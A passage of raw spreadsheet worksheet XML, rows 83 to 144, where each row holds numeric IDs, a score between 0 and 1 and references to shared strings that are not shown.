      <c r="D83">
        <v>0</v>
      </c>
      <c r="E83">
        <v>0.80279999971389771</v>
      </c>
      <c r="F83" t="s">
        <v>7</v>
      </c>
      <c r="G83" t="s">
        <v>170</v>
      </c>
      <c r="H83" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="84" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A84" s="1">
        <v>82</v>
      </c>
      <c r="B84">
        <v>1868</v>
      </c>
      <c r="C84">
        <v>1868</v>
      </c>
      <c r="D84">
        <v>0</v>
      </c>
      <c r="E84">
        <v>0.98089998960494995</v>
      </c>
      <c r="F84" t="s">
        <v>7</v>
      </c>
      <c r="G84" t="s">
        <v>172</v>
      </c>
      <c r="H84" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="85" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A85" s="1">
        <v>83</v>
      </c>
      <c r="B85">
        <v>1869</v>
      </c>
      <c r="C85">
        <v>1869</v>
      </c>
      <c r="D85">
        <v>0</v>
      </c>
      <c r="E85">
        <v>0.53939998149871826</v>
      </c>
      <c r="F85" t="s">
        <v>7</v>
      </c>
      <c r="G85" t="s">
        <v>174</v>
      </c>
      <c r="H85" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="86" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A86" s="1">
        <v>84</v>
      </c>
      <c r="B86">
        <v>1870</v>
      </c>
      <c r="C86">
        <v>1870</v>
      </c>
      <c r="D86">
        <v>0</v>
      </c>
      <c r="E86">
        <v>0.99290001392364502</v>
      </c>
      <c r="F86" t="s">
        <v>7</v>
      </c>
      <c r="G86" t="s">
        <v>176</v>
      </c>
      <c r="H86" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="87" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A87" s="1">
        <v>85</v>
      </c>
      <c r="B87">
        <v>1871</v>
      </c>
      <c r="C87">
        <v>1871</v>
      </c>
      <c r="D87">
        <v>0</v>
      </c>
      <c r="E87">
        <v>0.96139997243881226</v>
      </c>
      <c r="F87" t="s">
        <v>7</v>
      </c>
      <c r="G87" t="s">
        <v>178</v>
      </c>
      <c r="H87" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="88" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A88" s="1">
        <v>86</v>
      </c>
      <c r="B88">
        <v>1872</v>
      </c>
      <c r="C88">
        <v>1872</v>
      </c>
      <c r="D88">
        <v>0</v>
      </c>
      <c r="E88">
        <v>0.79780000448226929</v>
      </c>
      <c r="F88" t="s">
        <v>7</v>
      </c>
      <c r="G88" t="s">
        <v>180</v>
      </c>
      <c r="H88" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="89" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A89" s="1">
        <v>87</v>
      </c>
      <c r="B89">
        <v>4588</v>
      </c>
      <c r="C89">
        <v>4588</v>
      </c>
      <c r="D89">
        <v>0</v>
      </c>
      <c r="E89">
        <v>0.94599997997283936</v>
      </c>
      <c r="F89" t="s">
        <v>7</v>
      </c>
      <c r="G89" t="s">
        <v>182</v>
      </c>
      <c r="H89" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="90" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A90" s="1">
        <v>88</v>
      </c>
      <c r="B90">
        <v>5952</v>
      </c>
      <c r="C90">
        <v>5952</v>
      </c>
      <c r="D90">
        <v>0</v>
      </c>
      <c r="E90">
        <v>0.77209997177124023</v>
      </c>
      <c r="F90" t="s">
        <v>7</v>
      </c>
      <c r="G90" t="s">
        <v>184</v>
      </c>
      <c r="H90" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="91" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A91" s="1">
        <v>89</v>
      </c>
      <c r="B91">
        <v>1876</v>
      </c>
      <c r="C91">
        <v>1876</v>
      </c>
      <c r="D91">
        <v>0</v>
      </c>
      <c r="E91">
        <v>0.72839999198913574</v>
      </c>
      <c r="F91" t="s">
        <v>7</v>
      </c>
      <c r="G91" t="s">
        <v>186</v>
      </c>
      <c r="H91" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="92" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A92" s="1">
        <v>90</v>
      </c>
      <c r="B92">
        <v>1881</v>
      </c>
      <c r="C92">
        <v>1881</v>
      </c>
      <c r="D92">
        <v>0</v>
      </c>
      <c r="E92">
        <v>0.80640000104904175</v>
      </c>
      <c r="F92" t="s">
        <v>7</v>
      </c>
      <c r="G92" t="s">
        <v>188</v>
      </c>
      <c r="H92" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="93" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A93" s="1">
        <v>91</v>
      </c>
      <c r="B93">
        <v>1883</v>
      </c>
      <c r="C93">
        <v>1883</v>
      </c>
      <c r="D93">
        <v>0</v>
      </c>
      <c r="E93">
        <v>0.99790000915527344</v>
      </c>
      <c r="F93" t="s">
        <v>7</v>
      </c>
      <c r="G93" t="s">
        <v>190</v>
      </c>
      <c r="H93" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="94" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A94" s="1">
        <v>92</v>
      </c>
      <c r="B94">
        <v>1886</v>
      </c>
      <c r="C94">
        <v>1886</v>
      </c>
      <c r="D94">
        <v>0</v>
      </c>
      <c r="E94">
        <v>0.66439998149871826</v>
      </c>
      <c r="F94" t="s">
        <v>7</v>
      </c>
      <c r="G94" t="s">
        <v>192</v>
      </c>
      <c r="H94" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="95" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A95" s="1">
        <v>93</v>
      </c>
      <c r="B95">
        <v>1888</v>
      </c>
      <c r="C95">
        <v>1888</v>
      </c>
      <c r="D95">
        <v>0</v>
      </c>
      <c r="E95">
        <v>0.83099997043609619</v>
      </c>
      <c r="F95" t="s">
        <v>7</v>
      </c>
      <c r="G95" t="s">
        <v>194</v>
      </c>
      <c r="H95" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="96" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A96" s="1">
        <v>94</v>
      </c>
      <c r="B96">
        <v>1889</v>
      </c>
      <c r="C96">
        <v>1889</v>
      </c>
      <c r="D96">
        <v>0</v>
      </c>
      <c r="E96">
        <v>0.98739999532699585</v>
      </c>
      <c r="F96" t="s">
        <v>7</v>
      </c>
      <c r="G96" t="s">
        <v>196</v>
      </c>
      <c r="H96" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="97" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A97" s="1">
        <v>95</v>
      </c>
      <c r="B97">
        <v>1891</v>
      </c>
      <c r="C97">
        <v>1891</v>
      </c>
      <c r="D97">
        <v>0</v>
      </c>
      <c r="E97">
        <v>0.61799997091293335</v>
      </c>
      <c r="F97" t="s">
        <v>7</v>
      </c>
      <c r="G97" t="s">
        <v>198</v>
      </c>
      <c r="H97" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="98" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A98" s="1">
        <v>96</v>
      </c>
      <c r="B98">
        <v>1892</v>
      </c>
      <c r="C98">
        <v>1892</v>
      </c>
      <c r="D98">
        <v>0</v>
      </c>
      <c r="E98">
        <v>0.86100000143051147</v>
      </c>
      <c r="F98" t="s">
        <v>7</v>
      </c>
      <c r="G98" t="s">
        <v>200</v>
      </c>
      <c r="H98" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="99" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A99" s="1">
        <v>97</v>
      </c>
      <c r="B99">
        <v>1878</v>
      </c>
      <c r="C99">
        <v>1878</v>
      </c>
      <c r="D99">
        <v>0</v>
      </c>
      <c r="E99">
        <v>0.61879998445510864</v>
      </c>
      <c r="F99" t="s">
        <v>7</v>
      </c>
      <c r="G99" t="s">
        <v>202</v>
      </c>
      <c r="H99" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="100" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A100" s="1">
        <v>98</v>
      </c>
      <c r="B100">
        <v>1897</v>
      </c>
      <c r="C100">
        <v>1897</v>
      </c>
      <c r="D100">
        <v>0</v>
      </c>
      <c r="E100">
        <v>0.6413000226020813</v>
      </c>
      <c r="F100" t="s">
        <v>7</v>
      </c>
      <c r="G100" t="s">
        <v>204</v>
      </c>
      <c r="H100" t="s">
        <v>205</v>
      </c>
    </row>
    <row r="101" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A101" s="1">
        <v>99</v>
      </c>
      <c r="B101">
        <v>1862</v>
      </c>
      <c r="C101">
        <v>1862</v>
      </c>
      <c r="D101">
        <v>0</v>
      </c>
      <c r="E101">
        <v>0.9966999888420105</v>
      </c>
      <c r="F101" t="s">
        <v>7</v>
      </c>
      <c r="G101" t="s">
        <v>206</v>
      </c>
      <c r="H101" t="s">
        <v>207</v>
      </c>
    </row>
    <row r="102" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A102" s="1">
        <v>100</v>
      </c>
      <c r="B102">
        <v>4596</v>
      </c>
      <c r="C102">
        <v>4596</v>
      </c>
      <c r="D102">
        <v>0</v>
      </c>
      <c r="E102">
        <v>0.70429998636245728</v>
      </c>
      <c r="F102" t="s">
        <v>7</v>
      </c>
      <c r="G102" t="s">
        <v>208</v>
      </c>
      <c r="H102" t="s">
        <v>209</v>
      </c>
    </row>
    <row r="103" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A103" s="1">
        <v>101</v>
      </c>
      <c r="B103">
        <v>5950</v>
      </c>
      <c r="C103">
        <v>5950</v>
      </c>
      <c r="D103">
        <v>0</v>
      </c>
      <c r="E103">
        <v>0.67100000381469727</v>
      </c>
      <c r="F103" t="s">
        <v>7</v>
      </c>
      <c r="G103" t="s">
        <v>210</v>
      </c>
      <c r="H103" t="s">
        <v>211</v>
      </c>
    </row>
    <row r="104" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A104" s="1">
        <v>102</v>
      </c>
      <c r="B104">
        <v>1838</v>
      </c>
      <c r="C104">
        <v>1838</v>
      </c>
      <c r="D104">
        <v>0</v>
      </c>
      <c r="E104">
        <v>0.37799999117851257</v>
      </c>
      <c r="F104" t="s">
        <v>7</v>
      </c>
      <c r="G104" t="s">
        <v>212</v>
      </c>
      <c r="H104" t="s">
        <v>213</v>
      </c>
    </row>
    <row r="105" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A105" s="1">
        <v>103</v>
      </c>
      <c r="B105">
        <v>1839</v>
      </c>
      <c r="C105">
        <v>1839</v>
      </c>
      <c r="D105">
        <v>0</v>
      </c>
      <c r="E105">
        <v>0.44819998741149902</v>
      </c>
      <c r="F105" t="s">
        <v>7</v>
      </c>
      <c r="G105" t="s">
        <v>214</v>
      </c>
      <c r="H105" t="s">
        <v>215</v>
      </c>
    </row>
    <row r="106" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A106" s="1">
        <v>104</v>
      </c>
      <c r="B106">
        <v>1841</v>
      </c>
      <c r="C106">
        <v>1841</v>
      </c>
      <c r="D106">
        <v>0</v>
      </c>
      <c r="E106">
        <v>0.48759999871253967</v>
      </c>
      <c r="F106" t="s">
        <v>7</v>
      </c>
      <c r="G106" t="s">
        <v>216</v>
      </c>
      <c r="H106" t="s">
        <v>217</v>
      </c>
    </row>
    <row r="107" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A107" s="1">
        <v>105</v>
      </c>
      <c r="B107">
        <v>1842</v>
      </c>
      <c r="C107">
        <v>1842</v>
      </c>
      <c r="D107">
        <v>0</v>
      </c>
      <c r="E107">
        <v>0.49050000309944147</v>
      </c>
      <c r="F107" t="s">
        <v>7</v>
      </c>
      <c r="G107" t="s">
        <v>218</v>
      </c>
      <c r="H107" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="108" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A108" s="1">
        <v>106</v>
      </c>
      <c r="B108">
        <v>1843</v>
      </c>
      <c r="C108">
        <v>1843</v>
      </c>
      <c r="D108">
        <v>0</v>
      </c>
      <c r="E108">
        <v>0.98059999942779541</v>
      </c>
      <c r="F108" t="s">
        <v>7</v>
      </c>
      <c r="G108" t="s">
        <v>220</v>
      </c>
      <c r="H108" t="s">
        <v>221</v>
      </c>
    </row>
    <row r="109" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A109" s="1">
        <v>107</v>
      </c>
      <c r="B109">
        <v>5951</v>
      </c>
      <c r="C109">
        <v>5951</v>
      </c>
      <c r="D109">
        <v>0</v>
      </c>
      <c r="E109">
        <v>0.4390999972820282</v>
      </c>
      <c r="F109" t="s">
        <v>7</v>
      </c>
      <c r="G109" t="s">
        <v>222</v>
      </c>
      <c r="H109" t="s">
        <v>223</v>
      </c>
    </row>
    <row r="110" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A110" s="1">
        <v>108</v>
      </c>
      <c r="B110">
        <v>1861</v>
      </c>
      <c r="C110">
        <v>1861</v>
      </c>
      <c r="D110">
        <v>0</v>
      </c>
      <c r="E110">
        <v>0.79739999771118164</v>
      </c>
      <c r="F110" t="s">
        <v>7</v>
      </c>
      <c r="G110" t="s">
        <v>224</v>
      </c>
      <c r="H110" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="111" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A111" s="1">
        <v>109</v>
      </c>
      <c r="B111">
        <v>4604</v>
      </c>
      <c r="C111">
        <v>4604</v>
      </c>
      <c r="D111">
        <v>0</v>
      </c>
      <c r="E111">
        <v>0.49309998750686651</v>
      </c>
      <c r="F111" t="s">
        <v>7</v>
      </c>
      <c r="G111" t="s">
        <v>226</v>
      </c>
      <c r="H111" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="112" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A112" s="1">
        <v>110</v>
      </c>
      <c r="B112">
        <v>1851</v>
      </c>
      <c r="C112">
        <v>1851</v>
      </c>
      <c r="D112">
        <v>0</v>
      </c>
      <c r="E112">
        <v>0.9934999942779541</v>
      </c>
      <c r="F112" t="s">
        <v>7</v>
      </c>
      <c r="G112" t="s">
        <v>228</v>
      </c>
      <c r="H112" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="113" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A113" s="1">
        <v>111</v>
      </c>
      <c r="B113">
        <v>1853</v>
      </c>
      <c r="C113">
        <v>1853</v>
      </c>
      <c r="D113">
        <v>0</v>
      </c>
      <c r="E113">
        <v>0.99739998579025269</v>
      </c>
      <c r="F113" t="s">
        <v>7</v>
      </c>
      <c r="G113" t="s">
        <v>230</v>
      </c>
      <c r="H113" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="114" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A114" s="1">
        <v>112</v>
      </c>
      <c r="B114">
        <v>4598</v>
      </c>
      <c r="C114">
        <v>4598</v>
      </c>
      <c r="D114">
        <v>0</v>
      </c>
      <c r="E114">
        <v>0.90570002794265747</v>
      </c>
      <c r="F114" t="s">
        <v>7</v>
      </c>
      <c r="G114" t="s">
        <v>232</v>
      </c>
      <c r="H114" t="s">
        <v>233</v>
      </c>
    </row>
    <row r="115" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A115" s="1">
        <v>113</v>
      </c>
      <c r="B115">
        <v>4597</v>
      </c>
      <c r="C115">
        <v>4597</v>
      </c>
      <c r="D115">
        <v>0</v>
      </c>
      <c r="E115">
        <v>0.93199998140335083</v>
      </c>
      <c r="F115" t="s">
        <v>7</v>
      </c>
      <c r="G115" t="s">
        <v>234</v>
      </c>
      <c r="H115" t="s">
        <v>235</v>
      </c>
    </row>
    <row r="116" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A116" s="1">
        <v>114</v>
      </c>
      <c r="B116">
        <v>1857</v>
      </c>
      <c r="C116">
        <v>1857</v>
      </c>
      <c r="D116">
        <v>0</v>
      </c>
      <c r="E116">
        <v>0.61680001020431519</v>
      </c>
      <c r="F116" t="s">
        <v>7</v>
      </c>
      <c r="G116" t="s">
        <v>236</v>
      </c>
      <c r="H116" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="117" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A117" s="1">
        <v>115</v>
      </c>
      <c r="B117">
        <v>1858</v>
      </c>
      <c r="C117">
        <v>1858</v>
      </c>
      <c r="D117">
        <v>0</v>
      </c>
      <c r="E117">
        <v>0.79739999771118164</v>
      </c>
      <c r="F117" t="s">
        <v>7</v>
      </c>
      <c r="G117" t="s">
        <v>238</v>
      </c>
      <c r="H117" t="s">
        <v>239</v>
      </c>
    </row>
    <row r="118" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A118" s="1">
        <v>116</v>
      </c>
      <c r="B118">
        <v>1859</v>
      </c>
      <c r="C118">
        <v>1859</v>
      </c>
      <c r="D118">
        <v>0</v>
      </c>
      <c r="E118">
        <v>0.85170000791549683</v>
      </c>
      <c r="F118" t="s">
        <v>7</v>
      </c>
      <c r="G118" t="s">
        <v>240</v>
      </c>
      <c r="H118" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="119" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A119" s="1">
        <v>117</v>
      </c>
      <c r="B119">
        <v>4601</v>
      </c>
      <c r="C119">
        <v>4601</v>
      </c>
      <c r="D119">
        <v>0</v>
      </c>
      <c r="E119">
        <v>0.53240001201629639</v>
      </c>
      <c r="F119" t="s">
        <v>7</v>
      </c>
      <c r="G119" t="s">
        <v>242</v>
      </c>
      <c r="H119" t="s">
        <v>243</v>
      </c>
    </row>
    <row r="120" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A120" s="1">
        <v>118</v>
      </c>
      <c r="B120">
        <v>4576</v>
      </c>
      <c r="C120">
        <v>4576</v>
      </c>
      <c r="D120">
        <v>0</v>
      </c>
      <c r="E120">
        <v>0.52549999952316284</v>
      </c>
      <c r="F120" t="s">
        <v>7</v>
      </c>
      <c r="G120" t="s">
        <v>244</v>
      </c>
      <c r="H120" t="s">
        <v>245</v>
      </c>
    </row>
    <row r="121" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A121" s="1">
        <v>119</v>
      </c>
      <c r="B121">
        <v>1901</v>
      </c>
      <c r="C121">
        <v>1901</v>
      </c>
      <c r="D121">
        <v>0</v>
      </c>
      <c r="E121">
        <v>0.66060000658035278</v>
      </c>
      <c r="F121" t="s">
        <v>7</v>
      </c>
      <c r="G121" t="s">
        <v>246</v>
      </c>
      <c r="H121" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="122" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A122" s="1">
        <v>120</v>
      </c>
      <c r="B122">
        <v>1903</v>
      </c>
      <c r="C122">
        <v>1903</v>
      </c>
      <c r="D122">
        <v>0</v>
      </c>
      <c r="E122">
        <v>0.89240002632141113</v>
      </c>
      <c r="F122" t="s">
        <v>7</v>
      </c>
      <c r="G122" t="s">
        <v>248</v>
      </c>
      <c r="H122" t="s">
        <v>249</v>
      </c>
    </row>
    <row r="123" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A123" s="1">
        <v>121</v>
      </c>
      <c r="B123">
        <v>1940</v>
      </c>
      <c r="C123">
        <v>1940</v>
      </c>
      <c r="D123">
        <v>0</v>
      </c>
      <c r="E123">
        <v>0.80549997091293335</v>
      </c>
      <c r="F123" t="s">
        <v>7</v>
      </c>
      <c r="G123" t="s">
        <v>250</v>
      </c>
      <c r="H123" t="s">
        <v>251</v>
      </c>
    </row>
    <row r="124" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A124" s="1">
        <v>122</v>
      </c>
      <c r="B124">
        <v>7065</v>
      </c>
      <c r="C124">
        <v>7065</v>
      </c>
      <c r="D124">
        <v>0</v>
      </c>
      <c r="E124">
        <v>0.5569000244140625</v>
      </c>
      <c r="F124" t="s">
        <v>7</v>
      </c>
      <c r="G124" t="s">
        <v>252</v>
      </c>
      <c r="H124" t="s">
        <v>253</v>
      </c>
    </row>
    <row r="125" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A125" s="1">
        <v>123</v>
      </c>
      <c r="B125">
        <v>1942</v>
      </c>
      <c r="C125">
        <v>1942</v>
      </c>
      <c r="D125">
        <v>0</v>
      </c>
      <c r="E125">
        <v>0.36259999871253967</v>
      </c>
      <c r="F125" t="s">
        <v>7</v>
      </c>
      <c r="G125" t="s">
        <v>254</v>
      </c>
      <c r="H125" t="s">
        <v>255</v>
      </c>
    </row>
    <row r="126" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A126" s="1">
        <v>124</v>
      </c>
      <c r="B126">
        <v>1945</v>
      </c>
      <c r="C126">
        <v>1945</v>
      </c>
      <c r="D126">
        <v>0</v>
      </c>
      <c r="E126">
        <v>0.92690002918243408</v>
      </c>
      <c r="F126" t="s">
        <v>7</v>
      </c>
      <c r="G126" t="s">
        <v>256</v>
      </c>
      <c r="H126" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="127" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A127" s="1">
        <v>125</v>
      </c>
      <c r="B127">
        <v>1946</v>
      </c>
      <c r="C127">
        <v>1946</v>
      </c>
      <c r="D127">
        <v>0</v>
      </c>
      <c r="E127">
        <v>0.86599999666213989</v>
      </c>
      <c r="F127" t="s">
        <v>7</v>
      </c>
      <c r="G127" t="s">
        <v>258</v>
      </c>
      <c r="H127" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="128" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A128" s="1">
        <v>126</v>
      </c>
      <c r="B128">
        <v>1947</v>
      </c>
      <c r="C128">
        <v>1947</v>
      </c>
      <c r="D128">
        <v>0</v>
      </c>
      <c r="E128">
        <v>0.69059997797012329</v>
      </c>
      <c r="F128" t="s">
        <v>7</v>
      </c>
      <c r="G128" t="s">
        <v>260</v>
      </c>
      <c r="H128" t="s">
        <v>261</v>
      </c>
    </row>
    <row r="129" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A129" s="1">
        <v>127</v>
      </c>
      <c r="B129">
        <v>1948</v>
      </c>
      <c r="C129">
        <v>1948</v>
      </c>
      <c r="D129">
        <v>0</v>
      </c>
      <c r="E129">
        <v>0.43759998679161072</v>
      </c>
      <c r="F129" t="s">
        <v>7</v>
      </c>
      <c r="G129" t="s">
        <v>262</v>
      </c>
      <c r="H129" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="130" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A130" s="1">
        <v>128</v>
      </c>
      <c r="B130">
        <v>5972</v>
      </c>
      <c r="C130">
        <v>5972</v>
      </c>
      <c r="D130">
        <v>0</v>
      </c>
      <c r="E130">
        <v>0.99699997901916504</v>
      </c>
      <c r="F130" t="s">
        <v>7</v>
      </c>
      <c r="G130" t="s">
        <v>264</v>
      </c>
      <c r="H130" t="s">
        <v>265</v>
      </c>
    </row>
    <row r="131" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A131" s="1">
        <v>129</v>
      </c>
      <c r="B131">
        <v>1949</v>
      </c>
      <c r="C131">
        <v>1949</v>
      </c>
      <c r="D131">
        <v>0</v>
      </c>
      <c r="E131">
        <v>0.6021999716758728</v>
      </c>
      <c r="F131" t="s">
        <v>7</v>
      </c>
      <c r="G131" t="s">
        <v>266</v>
      </c>
      <c r="H131" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="132" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A132" s="1">
        <v>130</v>
      </c>
      <c r="B132">
        <v>7062</v>
      </c>
      <c r="C132">
        <v>7062</v>
      </c>
      <c r="D132">
        <v>0</v>
      </c>
      <c r="E132">
        <v>0.98869997262954712</v>
      </c>
      <c r="F132" t="s">
        <v>7</v>
      </c>
      <c r="G132" t="s">
        <v>268</v>
      </c>
      <c r="H132" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="133" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A133" s="1">
        <v>131</v>
      </c>
      <c r="B133">
        <v>7061</v>
      </c>
      <c r="C133">
        <v>7061</v>
      </c>
      <c r="D133">
        <v>0</v>
      </c>
      <c r="E133">
        <v>0.98890000581741333</v>
      </c>
      <c r="F133" t="s">
        <v>7</v>
      </c>
      <c r="G133" t="s">
        <v>270</v>
      </c>
      <c r="H133" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="134" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A134" s="1">
        <v>132</v>
      </c>
      <c r="B134">
        <v>1955</v>
      </c>
      <c r="C134">
        <v>1955</v>
      </c>
      <c r="D134">
        <v>0</v>
      </c>
      <c r="E134">
        <v>0.95279997587203979</v>
      </c>
      <c r="F134" t="s">
        <v>7</v>
      </c>
      <c r="G134" t="s">
        <v>271</v>
      </c>
      <c r="H134" t="s">
        <v>272</v>
      </c>
    </row>
    <row r="135" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A135" s="1">
        <v>133</v>
      </c>
      <c r="B135">
        <v>4552</v>
      </c>
      <c r="C135">
        <v>4552</v>
      </c>
      <c r="D135">
        <v>0</v>
      </c>
      <c r="E135">
        <v>0.99720001220703125</v>
      </c>
      <c r="F135" t="s">
        <v>7</v>
      </c>
      <c r="G135" t="s">
        <v>273</v>
      </c>
      <c r="H135" t="s">
        <v>274</v>
      </c>
    </row>
    <row r="136" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A136" s="1">
        <v>134</v>
      </c>
      <c r="B136">
        <v>1957</v>
      </c>
      <c r="C136">
        <v>1957</v>
      </c>
      <c r="D136">
        <v>0</v>
      </c>
      <c r="E136">
        <v>0.99599999189376831</v>
      </c>
      <c r="F136" t="s">
        <v>7</v>
      </c>
      <c r="G136" t="s">
        <v>275</v>
      </c>
      <c r="H136" t="s">
        <v>276</v>
      </c>
    </row>
    <row r="137" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A137" s="1">
        <v>135</v>
      </c>
      <c r="B137">
        <v>7057</v>
      </c>
      <c r="C137">
        <v>7057</v>
      </c>
      <c r="D137">
        <v>0</v>
      </c>
      <c r="E137">
        <v>0.61570000648498535</v>
      </c>
      <c r="F137" t="s">
        <v>7</v>
      </c>
      <c r="G137" t="s">
        <v>277</v>
      </c>
      <c r="H137" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="138" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A138" s="1">
        <v>136</v>
      </c>
      <c r="B138">
        <v>7056</v>
      </c>
      <c r="C138">
        <v>7056</v>
      </c>
      <c r="D138">
        <v>0</v>
      </c>
      <c r="E138">
        <v>0.52069997787475586</v>
      </c>
      <c r="F138" t="s">
        <v>7</v>
      </c>
      <c r="G138" t="s">
        <v>279</v>
      </c>
      <c r="H138" t="s">
        <v>280</v>
      </c>
    </row>
    <row r="139" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A139" s="1">
        <v>137</v>
      </c>
      <c r="B139">
        <v>4553</v>
      </c>
      <c r="C139">
        <v>4553</v>
      </c>
      <c r="D139">
        <v>0</v>
      </c>
      <c r="E139">
        <v>0.60439997911453247</v>
      </c>
      <c r="F139" t="s">
        <v>7</v>
      </c>
      <c r="G139" t="s">
        <v>281</v>
      </c>
      <c r="H139" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="140" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A140" s="1">
        <v>138</v>
      </c>
      <c r="B140">
        <v>1938</v>
      </c>
      <c r="C140">
        <v>1938</v>
      </c>
      <c r="D140">
        <v>0</v>
      </c>
      <c r="E140">
        <v>0.63650000095367432</v>
      </c>
      <c r="F140" t="s">
        <v>7</v>
      </c>
      <c r="G140" t="s">
        <v>283</v>
      </c>
      <c r="H140" t="s">
        <v>284</v>
      </c>
    </row>
    <row r="141" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A141" s="1">
        <v>139</v>
      </c>
      <c r="B141">
        <v>5971</v>
      </c>
      <c r="C141">
        <v>5971</v>
      </c>
      <c r="D141">
        <v>0</v>
      </c>
      <c r="E141">
        <v>0.99879997968673706</v>
      </c>
      <c r="F141" t="s">
        <v>7</v>
      </c>
      <c r="G141" t="s">
        <v>285</v>
      </c>
      <c r="H141" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="142" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A142" s="1">
        <v>140</v>
      </c>
      <c r="B142">
        <v>5970</v>
      </c>
      <c r="C142">
        <v>5970</v>
      </c>
      <c r="D142">
        <v>0</v>
      </c>
      <c r="E142">
        <v>0.99900001287460327</v>
      </c>
      <c r="F142" t="s">
        <v>7</v>
      </c>
      <c r="G142" t="s">
        <v>287</v>
      </c>
      <c r="H142" t="s">
        <v>288</v>
      </c>
    </row>
    <row r="143" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A143" s="1">
        <v>141</v>
      </c>
      <c r="B143">
        <v>4572</v>
      </c>
      <c r="C143">
        <v>4572</v>
      </c>
      <c r="D143">
        <v>0</v>
      </c>
      <c r="E143">
        <v>0.53020000457763672</v>
      </c>
      <c r="F143" t="s">
        <v>7</v>
      </c>
      <c r="G143" t="s">
        <v>289</v>
      </c>
      <c r="H143" t="s">
        <v>290</v>
      </c>
    </row>
    <row r="144" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A144" s="1">
        <v>142</v>
      </c>
      <c r="B144">
        <v>4571</v>
      </c>
      <c r="C144">
        <v>4571</v>
      </c>
      <c r="D144">
        <v>0</v>
      </c>
      <c r="E144">
        <v>0.79570001363754272</v>
      </c>
      <c r="F144" t="s">
        <v>7</v>
      </c>
      <c r="G144" t="s">
        <v>291</v>
      </c>
